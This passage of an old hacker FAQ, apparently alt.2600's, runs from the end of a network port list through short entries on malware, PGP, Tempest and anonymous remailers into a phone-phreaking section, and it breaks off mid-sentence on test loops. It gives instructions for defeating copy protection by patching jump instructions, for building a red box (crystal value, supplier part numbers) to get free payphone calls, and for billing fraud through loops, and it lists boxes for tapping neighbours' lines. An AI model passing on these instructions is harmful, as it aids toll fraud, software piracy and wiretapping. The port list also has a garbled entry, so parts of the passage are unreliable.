efs             520/tcp    extended file name server

router          520/udp    local routing process (on site);

                           uses variant of Xerox NS routing

                           information protocol

timed           525/tcp    timeserver

timed           525/udp    timeserver

tempo           526/tcp    newdate

tempo           526/udp    newdate

courier         530/tcp    rpc

courier         530/udp    rpc

conference      531/tcp    chat

conference      531/udp    chat

netnews         532/tcp    readnews

netnews         532/udp    readnews

netwall         533/tcp    for emergency broadcasts

netwall         533/udp    for emergency broadcasts

uucp            540/tcp    uucpd

uucp            540/udp    uucpd

klogin          543/tcp

klogin          543/udp

kshell          544/tcp    krcmd

kshell          544/udp    krcmd

new-rwho        550/tcp    new-who

new-rwho        550/udp    new-who

dsf             555/tcp

dsf             555/udp

remotefs        556/tcp    rfs server

remotefs        556/udp    rfs server

rmonitor        560/tcp    rmonitord

rmonitor        560/udp    rmonitord

monitor         561/tcp

monitor         561/udp

chshell         562/tcp    chcmd

chshell         562/udp    chcmd

9pfs            564/tcp    plan 9 file service

9pfs            564/udp    plan 9 file service

whoami          565/tcp    whoami

whoami          565/udp    whoami

meter           570/tcp    demon

meter           570/udp    demon

meter           571/tcp    udemon

meter           571/udp    udemon

ipcserver       600/tcp    Sun IPC server

ipcserver       600/udp    Sun IPC server

nqs             607/tcp    nqs

nqs             607/udp    nqs

mdqs            666/tcp

mdqs            666/udp

elcsd           704/tcp    errlog copy/server daemon

elcsd           704/udp    errlog copy/server daemon

netcp           740/tcp    NETscout Control Protocol

netcp           740/udp    NETscout Control Protocol

netgw           741/tcp    netGW

netgw           741/udp    netGW

netrcs          742/tcp    Network based Rev. Cont. Sys.

netrcs          742/udp    Network based Rev. Cont. Sys.

flexlm          744/tcp    Flexible License Manager

flexlm          744/udp    Flexible License Manager

fujitsu-dev     747/tcp    Fujitsu Device Control

fujitsu-dev     747/udp    Fujitsu Device Control

ris-cm          748/tcp    Russell Info Sci Calendar Manager

ris-cm          748/udp    Russell Info Sci Calendar Manager

kerberos-adm    749/tcp    kerberos administration

kerberos-adm    749/udp    kerberos administration

rfile           750/tcp

loadav          750/udp

pump            751/tcp

pump            751/udp

qrh             752/tcp

qrh             752/udp

rrh             753/tcp

rrh             753/udp

tell            754/tcp     send

tell            754/udp     send

nlogin          758/tcp

nlogin          758/udp

con             759/tcp

con             759/udp

ns              760/tcp

ns              760/udp

rxe             761/tcp

rxe             761/udp

quotad          762/tcp

quotad          762/udp

cycleserv       763/tcp

cycleserv       763/udp

omserv          764/tcp

omserv          764/udp

webster         765/tcp

webster         765/udp

phonebook       767/tcp    phone

phonebook       767/udp    phone

vid             769/tcp

vid             769/udp

cadlock         770/tcp

cadlock         770/udp

rtip            771/tcp

rtip            771/udp

cycleserv2      772/tcp

cycleserv2      772/udp

submit          773/tcp

notify          773/udp

rpasswd         774/tcp

acmaint_dbd     774/udp

entomb          775/tcp

acmaint_transd  775/udp

wpages          776/tcp

wpages          776/udp

wpgs            780/tcp

wpgs            780/udp

hp-collector    781/tcp        hp performance data collector

hp-collector    781/udp        hp performance data collector

hp-managed-node 782/tcp        hp performance data managed node

hp-managed-node 782/udp        hp performance data managed node

hp-alarm-mgr    783/tcp        hp performance data alarm manager

hp-alarm-mgr    783/udp        hp performance data alarm manager

mdbs_daemon     800/tcp

mdbs_daemon     800/udp

device          801/tcp

device          801/udp

xtreelic        996/tcp        XTREE License Server

xtreelic        996/udp        XTREE License Server

maitrd          997/tcp

maitrd          997/udp

busboy          998/tcp

puparp          998/udp

garcon          999/tcp

applix          999/udp        Applix ac

puprouter       999/tcp

puprouter       999/udp

cadlock         1000/tcp

ock             1000/udp

blackjack       1025/tcp   network blackjack

blackjack       1025/udp   network blackjack

hermes          1248/tcp

hermes          1248/udp

bbn-mmc         1347/tcp   multi media conferencing

bbn-mmc         1347/udp   multi media conferencing

bbn-mmx         1348/tcp   multi media conferencing

bbn-mmx         1348/udp   multi media conferencing

sbook           1349/tcp   Registration Network Protocol

sbook           1349/udp   Registration Network Protocol

editbench       1350/tcp   Registration Network Protocol

editbench       1350/udp   Registration Network Protocol

equationbuilder 1351/tcp   Digital Tool Works (MIT)

equationbuilder 1351/udp   Digital Tool Works (MIT)

lotusnote       1352/tcp   Lotus Note

lotusnote       1352/udp   Lotus Note

ingreslock      1524/tcp   ingres

ingreslock      1524/udp   ingres

orasrv          1525/tcp   oracle

orasrv          1525/udp   oracle

prospero-np     1525/tcp   prospero non-privileged

prospero-np     1525/udp   prospero non-privileged

tlisrv          1527/tcp   oracle

tlisrv          1527/udp   oracle

coauthor        1529/tcp   oracle

coauthor        1529/udp   oracle

issd            1600/tcp

issd            1600/udp

nkd             1650/tcp

nkd             1650/udp

callbook        2000/tcp

callbook        2000/udp

dc              2001/tcp

wizard          2001/udp    curry

globe           2002/tcp

globe           2002/udp

mailbox         2004/tcp

emce            2004/udp    CCWS mm conf

berknet         2005/tcp

oracle          2005/udp

invokator       2006/tcp

raid-cc         2006/udp    raid

dectalk         2007/tcp

raid-am         2007/udp

conf            2008/tcp

terminaldb      2008/udp

news            2009/tcp

whosockami      2009/udp

search          2010/tcp

pipe_server     2010/udp

raid-cc         2011/tcp    raid

servserv        2011/udp

ttyinfo         2012/tcp

raid-ac         2012/udp

raid-am         2013/tcp

raid-cd         2013/udp

troff           2014/tcp

raid-sf         2014/udp

cypress         2015/tcp

raid-cs         2015/udp

bootserver      2016/tcp

bootserver      2016/udp

cypress-stat    2017/tcp

bootclient      2017/udp

terminaldb      2018/tcp

rellpack        2018/udp

whosockami      2019/tcp

about           2019/udp

xinupageserver  2020/tcp

xinupageserver  2020/udp

servexec        2021/tcp

xinuexpansion1  2021/udp

down            2022/tcp

xinuexpansion2  2022/udp

xinuexpansion3  2023/tcp

xinuexpansion3  2023/udp

xinuexpansion4  2024/tcp

xinuexpansion4  2024/udp

ellpack         2025/tcp

xribs           2025/udp

scrabble        2026/tcp

scrabble        2026/udp

shadowserver    2027/tcp

shadowserver    2027/udp

submitserver    2028/tcp

submitserver    2028/udp

device2         2030/tcp

device2         2030/udp

blackboard      2032/tcp

blackboard      2032/udp

glogger         2033/tcp

glogger         2033/udp

scoremgr        2034/tcp

scoremgr        2034/udp

imsldoc         2035/tcp

imsldoc         2035/udp

objectmanager   2038/tcp

objectmanager   2038/udp

lam             2040/tcp

lam             2040/udp

interbase       2041/tcp

interbase       2041/udp

isis            2042/tcp

isis            2042/udp

isis-bcast      2043/tcp

isis-bcast      2043/udp

rimsl           2044/tcp

rimsl           2044/udp

cdfunc          2045/tcp

cdfunc          2045/udp

sdfunc          2046/tcp

sdfunc          2046/udp

dls             2047/tcp

dls             2047/udp

dls-monitor     2048/tcp

dls-monitor     2048/udp

shilp           2049/tcp

shilp           2049/udp

www-dev         2784/tcp   world wide web - development

www-dev         2784/udp   world wide web - development

NSWS            3049/tcp

NSWS            3049/ddddp

rfa             4672/tcp   remote file access server

rfa             4672/udp   remote file access server

commplex-main   5000/tcp

commplex-main   5000/udp

commplex-link   5001/tcp

commplex-link   5001/udp

rfe             5002/tcp   radio free ethernet

rfe             5002/udp   radio free ethernet

rmonitor_secure 5145/tcp

rmonitor_secure 5145/udp

padl2sim        5236/tcp

padl2sim        5236/udp

sub-process     6111/tcp   HP SoftBench Sub-Process Control

sub-process     6111/udp   HP SoftBench Sub-Process Control

xdsxdm          6558/udp

xdsxdm          6558/tcp

afs3-fileserver 7000/tcp   file server itself

afs3-fileserver 7000/udp   file server itself

afs3-callback   7001/tcp   callbacks to cache managers

afs3-callback   7001/udp   callbacks to cache managers

afs3-prserver   7002/tcp   users & groups database

afs3-prserver   7002/udp   users & groups database

afs3-vlserver   7003/tcp   volume location database

afs3-vlserver   7003/udp   volume location database

afs3-kaserver   7004/tcp   AFS/Kerberos authentication service

afs3-kaserver   7004/udp   AFS/Kerberos authentication service

afs3-volser     7005/tcp   volume managment server

afs3-volser     7005/udp   volume managment server

afs3-errors     7006/tcp   error interpretation service

afs3-errors     7006/udp   error interpretation service

afs3-bos        7007/tcp   basic overseer process

afs3-bos        7007/udp   basic overseer process

afs3-update     7008/tcp   server-to-server updater

afs3-update     7008/udp   server-to-server updater

afs3-rmtsys     7009/tcp   remote cache manager service

afs3-rmtsys     7009/udp   remote cache manager service

man             9535/tcp

man             9535/udp

isode-dua       17007/tcp

isode-dua       17007/udp





23. What is a trojan/worm/virus/logic bomb?



This FAQ answer is excerpted from: Computer Security Basics

                                   by Deborah Russell

                                   and G.T. Gengemi Sr.



Trojan:     An independent program that appears to perform a useful

            function but that hides another unauthorized program

            inside it.  When an authorized user performs the apparent

            function, the trojan horse performs the unauthorized

            function as well (often usurping the privileges of the

            user).



Virus:      A code fragment (not an independent program) that

            reproduces by attaching to another program.  It may damage

            data directly, or it may degrade system performance by

            taking over system resources which are then not available

            to authorized users.



Worm:       An independent program that reproduces by copying itself

            from one system to another, usually over a network.  Like

            a virus, a worm may damage data directly, or it may

            degrade system performance by tying up system resources and

            even shutting down a network.



Logic Bomb: A method for releasing a system attack of some kind.  It

            is triggered when a particular condition (e.g., a certain

            date or system operation) occurs.





24. How can I protect myself from virii and such?



Always write protect your floppy disks when you are not purposefully

writing to them.



Use ATTRIB to make all of your EXE and COM files read only.  This will

protect you from many poorly written viruses.



Scan any software that you receive with a recent copy of a good virus

scanner.  The best virus scanner currently available for DOS is F-Prot

by Fridrik Skulason.  The current version is FP-212C.  It is best to

use more than one virus scanner.  That will decrease your chances of

missing a virus.



Backup regularly, and keep several generations of backups on hand.

If you always backup over your last backup, you may find yourself with

an infected backup tape.





25. What is Cryptoxxxxxxx?



This FAQ answer is excerpted from: Computer Security Basics

                                   by Deborah Russell

                                   and G.T. Gengemi Sr.



A message is called either plaintext or cleartext.  The process of

disguising a message in such a way as to hide its substance is called

encryption.  An encrypted message is called ciphertext.  The process

of turning ciphertext back into plaintext is called decryption.



The art and science of keeping messages secure is called cryptography,

and it is practiced by cryptographers.  Cryptanalysts are

practitioners of cryptanalysis, the art and science of breaking

ciphertext, i.e. seeing through the disguise.  The branch of

mathematics embodying both cryptography and cryptanalysis is called

cryptology, and it's practitioners are called cryptologists.





26. What is PGP?



This FAQ answer is excerpted from: PGP(tm) User's Guide

                                   Volume I: Essential Topics

                                   by Philip Zimmermann



PGP(tm) uses public-key encryption to protect E-mail and data files.

Communicate securely with people you've never met, with no secure

channels needed for prior exchange of keys.  PGP is well featured and

fast, with sophisticated key management, digital signatures, data

compression, and good ergonomic design.



Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a

high security cryptographic software application for MS-DOS, Unix,

VAX/VMS, and other computers.  PGP allows people to exchange files or

messages with privacy, authentication, and convenience.  Privacy means

that only those intended to receive a message can read it.

Authentication means that messages that appear to be from a particular

person can only have originated from that person. Convenience means

that privacy and authentication are provided without the hassles of

managing keys associated with conventional cryptographic software.  No

secure channels are needed to exchange keys between users, which makes

PGP much easier to use.  This is because PGP is based on a powerful

new technology called "public key" cryptography.



PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)

public key cryptosystem with the speed of conventional cryptography,

message digests for digital signatures, data compression before

encryption, good ergonomic design, and sophisticated key management. 

And PGP performs the public-key functions faster than most other

software implementations.  PGP is public key cryptography for the

masses.





27. What is Tempest?



Computers and other electronic equipment release interference to their

surrounding environment.  You may observe this by placing two video

monitors close together.  The pictures will behave erratically until

you space them apart.



Although most of the time these emissions are simply annoyances, they

can sometimes be very helpful.  Suppose we wanted to see what project

a target was working on.  We could sit in a van outside her office and

use sensitive electronic equipment to attempt to pick up and decipher

the emanations from her video monitor.



Our competitor, however, could shield the emanations from her

equipment or use equipment without strong emanations.



Tempest is the US Government program for evaluation and endorsement

of electronic equipment that is safe from eavesdropping.





28. What is an anonymous remailer?



An anonymous remailer is a system on the Internet that allows you to

send e-mail anonymously or post messages to Usenet anonymously.



You apply for an anonymous ID at the remailer site.  Then, when you

send a message to the remailer, it sends it out from your anonymous ID

at the remailer.  No one reading the post will know your real account

name or host name.  If someone sends a message to your anonymous ID,

it will be forwarded to your real account by the remailer.





29. What are the addresses of some anonymous remailers?



The most popular and stable anonymous remailer is anon.penet.fi,

operated by Johan Helsingus.  To obtain an anonymous ID, mail

ping@anon.penet.fi.  For assistance is obtaining an anonymous account

at penet, mail help@anon.penet.fi.



To see a list on anonymous remailers, finger

remailer-list@kiwi.cs.berkeley.edu.





30. How do I defeat Copy Protection?



There are two common methods of defeating copy protection.  The first

is to use a program that removes copy protection.  Popular programs

that do this are CopyIIPC from Central Point Software and CopyWrite

from Quaid Software.  The second method involves patching the copy

protected program.  For popular software, you may be able to locate a

ready made patch.  You can them apply the patch using any hex editor,

such as debug or the Peter Norton's DiskEdit.  If you cannot, you must

patch the software yourself.



Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It

also requires some knowledge of assembly language.  Load the protected

program under the debugger and watch for it to check the protection

mechanism.  When it does, change that portion of the code.  The code

can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to

JMP (Jump Unconditionally).  Or the code may simply be replaced with

NOP (No Operation) instructions.





31. What is 127.0.0.1?



127.0.0.1 is a loopback network connection.  If you telnet, ftp, etc...

to it you are connected to your own machine.









Section B: Telephony

~~~~~~~~~~~~~~~~~~~~



01. What is a Red Box?



When a coin is inserted into a payphone, the phone emits a set of

tones.  A red box is a device that simulates those tones, with the

purpose of fooling the payphone into believing you have inserted an

actual coin.  The actual tones are:



Nickel Signal      1700+2200  0.060s on

Dime Signal        1700+2200  0.060s on, 0.060s off, twice repeating

Quarter Signal     1700+2200  33ms on, 33ms off, 5 times repeating





02. How do I build a Red Box?



Red boxes are commonly manufactured from modified Radio Shack tone

dialers, Hallmark greeting cards, or made from scratch from readily

available electronic components.



To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,

open the dialer and replace the crystal (the largest shiny metal

component).  The exact value needed is 6.502457409Mhz.  Unfortunately,

that crystal is not commonly manufactured.  A crystal close to that

value will create a tone that falls within tolerances.  The most

popular choice is the 6.5536Mhz crystal.  When you are finished

replacing the crystal, program the P1 button with five *'s.  That will

simulate a quarter tone each time you press P1.





03. Where can I get a 6.5536Mhz crystal?



Your best bet is a local electronics store.  Radio Shack sells them,

but they are overpriced and the store must order them in.  This takes

approximately two weeks.  In addition, many Radio Shack employees do

not know that this can be done.



Or, you could order the crystal mail order.  This introduces Shipping

and Handling charges, which are usually much greater than the price of

the crystal.  It's best to get several people together to share the

S&H cost.  Or, buy five or six yourself and sell them later.  Some of

the places you can order crystals are:



Digi-Key

701 Brooks Avenue South

P.O. Box 677

Thief River Falls, MN 56701-0677

(80)344-4539

Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */

Part Number:X018-ND



JDR Microdevices:

2233 Branham Lane

San Jose, CA 95124

(800)538-5000

Part Number: 6.5536MHZ



Tandy Express Order Marketing

401 NE 38th Street

Fort Worth, TX 76106

(800)241-8742

Part Number: 10068625





04. Which payphones will a Red Box work on?



Red Boxes will work on TelCo owned payphones, but not on COCOT's

(Customer Owned Coin Operated Telephones).





05. What is a Blue Box?



Blue boxes use a 2600hz tone to convince telephone switches that use

in-band signalling that the caller is actually a telephone operator.

The caller may then access special switch functions, with the usual

purpose of making free long distance phone calls, using the

Multi-Frequency tones provided by the Blue Box.





06. Do Blue Boxes still work?



Blue Boxes still work in areas using in-band signalling.  Modern phone

signalling switches using ESS (Electronic Signalling Systems) use

out-of-band-signalling.  Nothing you send over the voice portion of

bandwidth can control the switch.





07. What is a Black Box?



A Black Box is a 1.8k ohm resistor placed across your phone line to

cause the phone company equipment to be unable to detect that you have

answered your telephone.  People who call you will then not be billed

for the telephone call.  Black boxes do not work under ESS.





08. What do all the colored boxes do?



Acrylic      Steal Three-Way-Calling, Call Waiting and programmable

	     Call Forwarding on old 4-wire phone systems

Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace

Beige        Lineman's hand set

Black        Allows the calling party to not be billed for the call

	     placed

Blast        Phone microphone amplifier

Blotto       Supposedly shorts every fone out in the immediate area

Blue         Emulate a true operator by seizing a trunk with a 2600hz

	     tone

Brown        Create a party line from 2 phone lines

Bud          Tap into your neighbors phone line

Chartreuse   Use the electricity from your phone line

Cheese       Connect two phones to create a diverter

Chrome       Manipulate Traffic Signals by Remote Control

Clear        A telephone pickup coil and a small amp use to make free

	     calls on Fortress Phones

Color        Line activated telephone recorder

Copper       Cause crosstalk interference on an extender

Crimson      Hold button

Dark         Re-route outgoing or incoming calls to another phone

Dayglo       Connect to your neighbors phone line

Divertor     Re-route outgoing or incoming calls to another phone

DLOC         Create a party line from 2 phone lines

Gold         Trace calls, tell if the call is being traced, and can

	     change a trace

Green        Emulate the Coin Collect, Coin Return, and Ringback tones

Infinity     Remotely activated phone tap

Jack         Touch-Tone key pad

Light        In-use light

Lunch        AM transmitter

Magenta      Connect a remote phone line to another remote phone line

Mauve        Phone tap without cutting into a line

Neon         External microphone

Noise        Create line noise

Olive        External ringer

Party        Create a party line from 2 phone lines

Pearl        Tone generator

Pink         Create a party line from 2 phone lines

Purple       Telephone hold button

Rainbow      Kill a trace by putting 120v into the phone line (joke)

Razz         Tap into your neighbors phone

Red          Make free phone calls from pay phones by generating

	     quarter tones

Rock         Add music to your phone line

Scarlet      Cause a neighbors phone line to have poor reception

Silver       Create the DTMF tones for A, B, C and D

Static       Keep the voltage on a phone line high

Switch       Add hold, indicator lights, conferencing, etc..

Tan          Line activated telephone recorder

Tron         Reverse the phase of power to your house, causing your

	     electric meter to run slower

TV Cable     "See" sound waves on your TV

Urine        Create a capacitative disturbance between the ring and

	     tip wires in another's telephone headset

Violet       Keep a payphone from hanging up

White        Portable DTMF keypad

Yellow       Add an extension phone





09. What is an ANAC number?



An ANAC (Automatic Number Announcement Circuit) number is a telephone

number that plays back the number of the telephone that called it.

ANAC numbers are convenient if you want to know the telephone number

of a pair of wires.





10. What is the ANAC number for my area?



How to find your ANAC number:



Look up your NPA (Area Code) and try the number listed for it. If that

fails, try 1 plus the number listed for it.  If that fails, try the

common numbers like 311, 958 and 200-222-2222.  If you find the ANAC

number for your area, please let us know.



Note that many times the ANAC number will vary for different switches

in the same city.  The geographic naming on the list is not intended

to be an accurate reference for coverage patterns, it is for

convenience only.



Many companies operate 800 number services which will read back to you

the number from which you are calling.  Many of these require

navigating a series of menus to get the phone number you are looking

for.



(800)238-4959   A voice mail system

(800)328-2630   A phone sex line

(800)568-3197   Info Access Telephone Company's Automated Blocking Line

(800)571-8859   A phone sex line

(800)692-6447   (800)MY-ANI-IS

(800)769-3766   Duke Power Company Automated Outage System



An non-800 ANAC that works nationwide is 404-988-9664.  The one catch

with this number is that it must be dialed with the AT&T Carrier

Access Code 10732.



Another non-800 nationwide ANAC is Glen Robert of Full Disclosure

Magazine's number, 10555-1-708-356-9646.



Please use local ANAC numbers if you can, as abuse or overuse kills

800 ANAC numbers.





NPA  ANAC number      Comments

---  ---------------  ---------------------------------------------

201  958              Hackensack/Jersey City/Newark/Paterson, NJ

202  958-xxxx         District of Columbia

203  960              CT (All)

203  970              CT (All)

205  908-222-2222     Birmingham, AL

206  411              WA /* Not US West */

207  958              ME (All)

209  830              Stockton, CA

212  958              Manhattan, NY

213  114              Los Angeles, CA

213  1223             Los Angeles, CA /* some 1AESS switches */

213  211-2345         Los Angeles, CA /* English response */

213  211-2346         Los Angeles, CA /* DTMF response */

213  61056            Los Angeles, CA

214  570              Dallas, TX

214  790              Dallas, TX /* GTE */

214  970-222-2222     Dallas, TX

214  970-611-1111     Dallas, TX /* Southwestern Bell */

215  410-xxxx         Philadelphia, PA

215  511              Philadelphia, PA

215  958              Philadelphia, PA

217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL

301  958-9968         Hagerstown/Rockville, MD

305  200-222-2222     Ft. Lauderdale/Key West/Miami, FL

309  200-xxx-xxxx     Peoria/Rock Island, IL

310  114              Long Beach, CA /* on many GTE switches */

310  1223             Long Beach, CA /* some 1AESS switches */

310  211-2345         Long Beach, CA /* English response */

310  211-2346         Long Beach, CA /* DTMF response */

312  200              Chicago, IL

312  290              Chicago, IL

312  1-200-8825       Chicago, IL (Last four change rapidly)

312  1-200-555-1212   Chicago, IL

313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI

313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI

313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI

313  200200200200200  Ann Arbor/Dearborn/Detroit, MI

314  410-xxxx#        Columbia/Jefferson City/St.Louis, MO

314  511              Columbia/Jefferson City/St.Louis, MO

315  953              Syracuse/Utica, NY

315  958              Syracuse/Utica, NY

315  998              Syracuse/Utica, NY

317  310-222-2222     Indianapolis/Kokomo, IN

317  743-1218         Indianapolis/Kokomo, IN

401  200-200-4444     RI (All)

401  222-2222         RI (All)

402  311              Lincoln, NE

404  311              Atlanta, GA

404  940-xxx-xxxx     Atlanta, GA

405  890-7777777      Enid/Oklahoma City, OK

405  897              Enid/Oklahoma City, OK

407  200-222-2222     Orlando/West Palm Beach, FL

408  300-xxx-xxxx     San Jose, CA

408  760              San Jose, CA

408  940              San Jose, CA

409  951              Beaumont/Galveston, TX

409  970-xxxx         Beaumont/Galveston, TX

410  200-6969         Annapolis/Baltimore, MD

410  200-555-1212     Annapolis/Baltimore, MD

410  811              Annapolis/Baltimore, MD

412  711-6633         Pittsburgh, PA

412  711-4411         Pittsburgh, PA

412  999-xxxx         Pittsburgh, PA

413  958              Pittsfield/Springfield, MA

413  200-555-5555     Pittsfield/Springfield, MA

414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI

415  200-555-1212     San Francisco, CA

415  211-2111         San Francisco, CA

415  2222             San Francisco, CA

415  640              San Francisco, CA

415  760-2878         San Francisco, CA

415  7600-2222        San Francisco, CA

419  311              Toledo, OH

502  2002222222       Frankfort/Louisville/Paducah/Shelbyville, KY

502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY

503  611              Portland, OR  /* not all parts of town */

504  99882233         Baton Rouge/New Orleans, LA

504  201-269-1111     Baton Rouge/New Orleans, LA

504  998              Baton Rouge/New Orleans, LA

504  99851-0000000000 Baton Rouge/New Orleans, LA

508  958              Fall River/New Bedford/Worchester, MA

508  200-222-1234     Fall River/New Bedford/Worchester, MA

508  200-222-2222     Fall River/New Bedford/Worchester, MA

509  560              Spokane/Walla Walla/Yakima, WA

512  830              Austin/Corpus Christi, TX

512  970-xxxx         Austin/Corpus Christi, TX

515  5463             Des Moines, IA

515  811              Des Moines, IA

516  958              Hempstead/Long Island, NY

516  968              Hempstead/Long Island, NY

517  200-222-2222     Bay City/Jackson/Lansing, MI

517  200200200200200  Bay City/Jackson/Lansing, MI

518  997              Albany/Schenectady/Troy, NY

518  998              Albany/Schenectady/Troy, NY

602  593-0809         Phoenix, AZ

602  593-6017         Phoenix, AZ

602  593-7451         Phoenix, AZ

603  200-222-2222     NH (All)

606  997-555-1212     Ashland/Winchester, KY

606  711              Ashland/Winchester, KY

607  993              Binghamton/Elmira, NY

609  958              Atlantic City/Camden/Trenton/Vineland, NJ

610  958              Allentown/Reading, PA

612  511              Minneapolis/St.Paul, MN

615  200200200200200  Nashville, TN

615  2002222222       Nashville, TN

615  830              Nashville, TN

616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI

617  200-222-1234     Boston, MA

617  200-222-2222     Boston, MA

617  200-444-4444     Boston, MA /* Woburn, MA */

617  220-2622         Boston, MA

617  958              Boston, MA

618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL

618  930              Alton/Cairo/Mt.Vernon, IL

703  811              Alexandria/Arlington/Roanoke, VA

708  1-200-555-1212   Chicago/Elgin, IL

708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)

708  356-9646         Chicago/Elgin, IL

713  970-xxxx         Houston, TX

714  211-2121         Anaheim, CA /* GTE */

714  211-2222         Anaheim, CA /* GTE */

716  511              Buffalo/Niagara Falls/Rochester, NY /* Rochester Tel */

717  958              Harrisburg/Scranton/Wilkes-Barre, PA

718  958              Bronx/Brooklyn/Queens/Staten Island, NY

802  2-222-222-2222   Vermont (All)

802  200-222-2222     Vermont (All)

805  211-2345         Bakersfield/Santa Barbara, CA

805  211-2346         Bakersfield/Santa Barbara, CA (Returns DTMF)

805  830              Bakersfield/Santa Barbara, CA

806  970-xxxx         Amarillo/Lubbock, TX

810  200200200200200  Flint/Pontiac/Southfield/Troy, MI

812  410-555-1212     Evansville, IN

813  311              Ft. Meyers/St. Petersburg/Tampa, FL

815  200-xxx-xxxx     La Salle/Rockford, IL

815  290              La Salle/Rockford, IL

817  211              Ft. Worth/Waco, TX

817  970-611-1111     Ft. Worth/Waco, TX  /* Southwestern Bell */

818  1223             Pasadena, CA /* some 1AESS switches */

818  211-2345         Pasadena, CA /* English response */

818  211-2346         Pasadena, CA /* DTMF response */

906  1-200-222-2222   Marquette/Sault Ste. Marie, MI

908  958              New Brunswick, NJ

910  200              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC

910  311              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC

910  988              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC

914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY

915  970-xxxx         Abilene/El Paso, TX

919  711              Durham, NC



Canada:

204  644-xxxx         Manitoba

306  115              Saskatchewan, Canada

403  311              Alberta, Yukon and N.W. Territory

403  908-222-2222     Alberta, Yukon and N.W. Territory

403  999              Alberta, Yukon and N.W. Territory

416  410-xxxx         Toronto, Ontario

416  997-xxxx         Toronto, Ontario

514  320-xxxx         Montreal, Quebec

519  320-xxxx         London, Ontario

604  1116             British Columbia, Canada

604  1211             British Columbia, Canada

604  211              British Columbia, Canada

613  320-2232         Ottawa, Ontario

705  320-xxxx         Saulte Ste. Marie, Ontario



Australia:

+61  03-552-4111      Victoria 03 area

+612 19123            All major capital cities



United Kingdom:

175





11. What is a ringback number?



A ringback number is a number that you call that will immediately

ring the telephone from which it was called.



In most instances you must call the ringback number, quickly hang up

the phone for just a short moment and then let up on the switch, you

will then go back off hook and hear a different tone.  You may then

hang up.  You will be called back seconds later.





12. What is the ringback number for my area?



An 'x' means insert those numbers from the phone number from which you

are calling.  A '?' means that the number varies from switch to switch

in the area, or changes from time to time.  Try all possible

combinations.



If the ringback for your NPA is not listed, try common ones such as

954, 957 and 958.  Also, try using the numbers listed for other NPA's

served by your telephone company.



201  551-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ

202  958-xxxx         District of Columbia

203  991-xxxx         CT (All)

209  890-xxxx         Stockton, CA

213  1-95x-xxxx       Los Angeles, CA

301  579-xxxx         Hagerstown/Rockville, MD

301  958-xxxx         Hagerstown/Rockville, MD

303  99X-xxxx         Grand Junction, CO

305  999-xxxx         Ft. Lauderdale/Key West/Miami, FL

312  511-xxxx         Chicago, IL

312  511-xxx-xxxx     Chicago, IL

312  57?-xxxx         Chicago, IL

315  98x-xxxx         Syracuse/Utica, NY

317  777-xxxx         Indianapolis/Kokomo, IN

317  yyy-xxxx         Indianapolis/Kokomo, IN /* y=3rd digit of phone number */

401  98?-xxxx         RI (All)

401  98?xxx-xxxx      RI (All)

404  450-xxxx         Atlanta, GA

407  988-xxxx         Orlando/West Palm Beach, FL

412  985-xxxx         Pittsburgh, PA

414  977-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI

414  978-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI

415  350-xxxx         San Francisco, CA

417  551-xxxx         Joplin/Springfield, MO

501  721-xxx-xxxx     AR (All)

502  988              Frankfort/Louisville/Paducah/Shelbyville, KY

504  99x-xxxx         Baton Rouge/New Orleans, LA

504  9988776655       Baton Rouge/New Orleans, LA

512  95X-xxxx         Austin, TX

516  660-xxx-xxxx     Hempstead/Long Island, NY

601  777-xxxx         MS (All)

609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ

616  946-xxxx         Battle Creek/Grand Rapids/Kalamazoo, MI

619  331-xxxx         San Diego, CA

619  332-xxxx         San Diego, CA

703  958-xxxx         Alexandria/Arlington/Roanoke, VA

714  330?             Anaheim, CA /* GTE */

716  981-xxxx         Rochester, NY /* Rochester Tel */

719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO

801  938-xxxx         Utah (All)

801  939-xxxx         Utah (All)

804  260              Charlottesville/Newport News/Norfolk/Richmond, VA

805  114              Bakersfield/Santa Barbara, CA

805  980-xxxx         Bakersfield/Santa Barbara, CA

813  711              Ft. Meyers/St. Petersburg/Tampa, FL

817  971                /* Press 2# */

906  951-xxx-xxxx     Marquette/Sault Ste. Marie, MI

908  55?-xxxx         New Brunswick, NJ

914  660-xxxx         Peekskill/Poughkeepsie/White Plains/Yonkers, NY



Canada:

416  57x-xxxx         Toronto, Ontario

416  99x-xxxx         Toronto, Ontario

416  999-xxx-xxxx     Toronto, Ontario

514  320-xxx-xxxx     Montreal, Quebec

613  999-xxx-xxxx     Ottawa, Ontario



Australia:

+61 199



United Kingdom:

174





13. What is a loop?



This FAQ answer is excerpted from: ToneLoc v0.99 User Manual

				   by Minor Threat & Mucho Maas



Loops are a pair of phone numbers, usually consecutive, like 836-9998

and 836-9999.  They are used by the phone company for testing.  What

good do loops do us?  Well, they are cool in a few ways.  Here is a

simple use of loops.  Each loop has two ends, a 'high' end, and a

'low' end.  One end gives a (usually) constant, loud tone when it is

called. The other end is silent.  Loops don't usually ring either.

When BOTH ends are called, the people that called each end can talk

through the loop.  Some loops are voice filtered and won't pass

anything but a constant tone; these aren't much use to you.  Here's

what you can use working loops for:  billing phone calls!  First, call

the end that gives the loud tone.  Then if the operator or someone

calls the other end, the tone will go quiet.  Act like the phone just

rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or

what the fuck ever.  The operator thinks that she just called you, and

